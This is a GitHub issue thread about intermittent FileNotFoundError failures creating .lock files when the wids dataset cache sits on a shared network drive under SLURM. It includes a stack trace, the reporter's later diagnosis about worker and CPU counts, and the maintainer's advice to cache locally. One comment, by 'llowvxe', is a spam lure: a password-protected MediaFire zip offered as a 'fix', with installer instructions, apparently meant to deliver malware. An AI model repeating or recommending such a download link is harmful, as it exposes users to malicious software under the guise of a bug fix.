### ISSUE TITLE
FileNotFoundError: [Errno 2] No such file or directory: '.../1489314_x16805_y17845.tar.lock'

### ISSUE THREAD

**Issue by cgebbe** [webdataset/webdataset#386]
- Given I'm on a SLURM cluster, my WIDS data sits on S3 and is cached to the same network drive
- when starting multiple trainings
- I now frequently observed an error like `FileNotFoundError: [Errno 2] No such file or directory: '/.../1489314_x16805_y17845.tar.lock'`

I've briefly skimmed the code and believe that multiple trainings might interfere with each other and that the lock-context can be reduced. Will investigate further and potentially submit a PR.

```python
# full stacktrace
 91   File "/workspace/venv/lib/python3.11/site-packages/wids/wids.py", line 575, in __getitem__
 92     shard, inner_idx, desc = self.get_shard(index)
 93                              ^^^^^^^^^^^^^^^^^^^^^
 94   File "/workspace/venv/lib/python3.11/site-packages/wids/wids.py", line 570, in get_shard
 95     shard = self.cache.get_shard(url)
 96             ^^^^^^^^^^^^^^^^^^^^^^^^^
 97   File "/workspace/venv/lib/python3.11/site-packages/wids/wids.py", line 383, in get_shard
 98     with download_and_open(url, local) as stream:
 99          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
100   File "/workspace/venv/lib/python3.11/site-packages/wids/wids_dl.py", line 128, in download_and_open
101     with ULockFile(local + ".lock"):
102   File "/workspace/venv/lib/python3.11/site-packages/wids/wids_dl.py", line 26, in __enter__
103     self.lockfile = open(self.lockfile_path, "w")
104                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
105 FileNotFoundError: [Errno 2] No such file or directory: '/scratch/wds/1489314_x16805_y17845.tar.lock'
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cgebbe** [comment]
Hmm... now also happened with a single training. I wonder whether this is rather due to a brittle connection to the attached network drive after all.

**Comment by cgebbe** [comment]
In case everybody else sees this: After some more experiments, the likely cause is that `num_workers >> num_cpus`. Difficult to say with absolute certainty since errors occur randomly, but increasing CPU count in the SLURM job reduced error rate significantly.

What might also have helped is using a different cache folder for parallel trainings.

**Comment by tmbdev** [comment]
Sorry for not responding earlier, but that sounds like some sort of file system problem.

Furthermore, caching to network drives is generally not a good idea. And running wids on a network drive is going to kill performance because network drives are not good at random access.

It's best to set your cache size such that you cache to a local SSD or even a RAM disk.
